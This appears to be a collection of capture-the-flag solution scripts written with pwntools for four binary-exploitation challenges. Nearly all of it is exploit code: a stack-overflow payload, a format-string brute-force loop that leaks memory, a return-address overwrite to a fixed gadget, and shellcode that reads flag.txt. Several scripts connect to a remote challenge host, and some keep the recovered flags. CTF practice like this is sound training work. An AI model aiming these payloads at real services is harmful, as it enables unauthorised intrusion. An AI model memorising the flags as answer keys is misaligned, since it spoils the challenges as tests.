amongus
!/usr/bin/env python3
from pwn import *
elf = ELF("./amogus_patched")
context.binary = elf
context.terminal = ['tmux', 'splitw', '-hl', '130']
#context.log_level = "debug"
gs = '''
b gameplay
continue
'''
def one_gadget(filename, base_addr=0):
return [(int(i)+base_addr) for i in subprocess.check_output(['one_gadget', '--raw', '-l1', filename]).decode().split(' ')]
#onegadgets = one_gadget('libc.so.6', libc.address)
def start():
if args.REMOTE:
return remote("43.205.113.100", 8359)
if args.GDB:
return gdb.debug([elf.path], gdbscript=gs)
else:
return process([elf.path])
r = start()
def rcu(d1, d2=0):
r.recvuntil(d1, drop=True)
if (d2):
return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value
#========= exploit here ===================
payload = b"A"*0x10
payload += b"ALIVE"
payload += b"\x00"*3
payload += p64(0)
sla(b"name:", payload)
#shaktictf{ch@ng3d_fat3_wh3n_I_s@w_r3d_v3nt_}
#========= interactive ====================
r.interactive()
mission
#!/usr/bin/env python3
from pwn import *
elf = ELF("./mission_patched")
context.binary = elf
context.terminal = ['tmux', 'splitw', '-hl', '130']
#context.log_level = "debug"
gs = '''
continue
'''
def start():
if args.REMOTE:
return remote("127.0.0.1", 1337)
if args.GDB:
return gdb.debug([elf.path], gdbscript=gs)
else:
return process([elf.path])
#r = start()
def rcu(d1, d2=0):
r.recvuntil(d1, drop=True)
if (d2):
return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value
#========= exploit here ===================
from pwn import *
def start():
return process("./mission")
for i in range(64, 0x300):
try:
r = start()
sla = lambda d, s: r.sendlineafter(d, s)
sla(b"/n)", b"y")
fmt = f"%{i}$s".encode()
sla(b"again?", fmt)
try:
r.recvuntil(b"working with you")
except EOFError:
log.warning(f"[{i}] EOF before prompt")
r.close()
continue
try:
leak = r.recvline(timeout=0.2).strip()
except EOFError:
log.warning(f"[{i}] EOF during leak recv")
r.close()
continue
if b"testflag" in leak:
log.success(f"[{i}] Found flag: {leak}")
r.close()
break
else:
log.info(f"[{i}] Leak: {leak}")
r.close()
except Exception as e:
log.error(f"[{i}] Exception: {e}")
#========= interactive ====================
#r.interactive()
Rickrolled
#!/usr/bin/env python3
from pwn import *
elf = ELF("./rickrolled_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")
context.binary = elf
context.terminal = ['tmux', 'splitw', '-hl', '130']
#context.log_level = "debug"
gs = '''
b main
continue
'''
def one_gadget(filename, base_addr=0):
return [(int(i)+base_addr) for i in subprocess.check_output(['one_gadget', '--raw', '-l1', filename]).decode().split(' ')]
#onegadgets = one_gadget('libc.so.6', libc.address)
def start():
if args.REMOTE:
return remote("43.205.113.100", 8862)
if args.GDB:
return gdb.debug([elf.path], gdbscript=gs)
else:
return process([elf.path])
r = start()
def rcu(d1, d2=0):
r.recvuntil(d1, drop=True)
if (d2):
return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value
#========= exploit here ===================
payload = b"A"*48
payload += p64(0x405000+0x100)
payload += p64(0x000000000040125a)
sla(b"me?\n", payload)
#shakticon25{r0p_cH@!n_n3v3r_gOnna_let_u_dowN}
#========= interactive ====================
r.interactive()
Sea Shells
This one was easy, but cool
#!/usr/bin/env python3
from pwn import *
elf = ELF("./seashells_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")
context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
continue
'''
def start():
if args.REMOTE:
return remote("43.205.113.100", 8014)
if args.GDB:
return gdb.debug([elf.path], gdbscript=gs)
else:
return process([elf.path])
r = start()
def rcu(d1, d2=0):
r.recvuntil(d1, drop=True)
if (d2):
return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value
#========= exploit here ===================
sc = shellcraft.open('flag.txt', 0) # syscall open("flag.txt", O_RDONLY)
sc += shellcraft.read('rax', 'rsp', 0x100) # syscall read(fd=rax, buf=rsp, 0x100 bytes)
sc += shellcraft.write(1, 'rsp', 0x100) # syscall write(1, rsp, 0x100)
payload = asm(sc)
sla(b">>", payload)
#========= interactive ====================
r.interactive()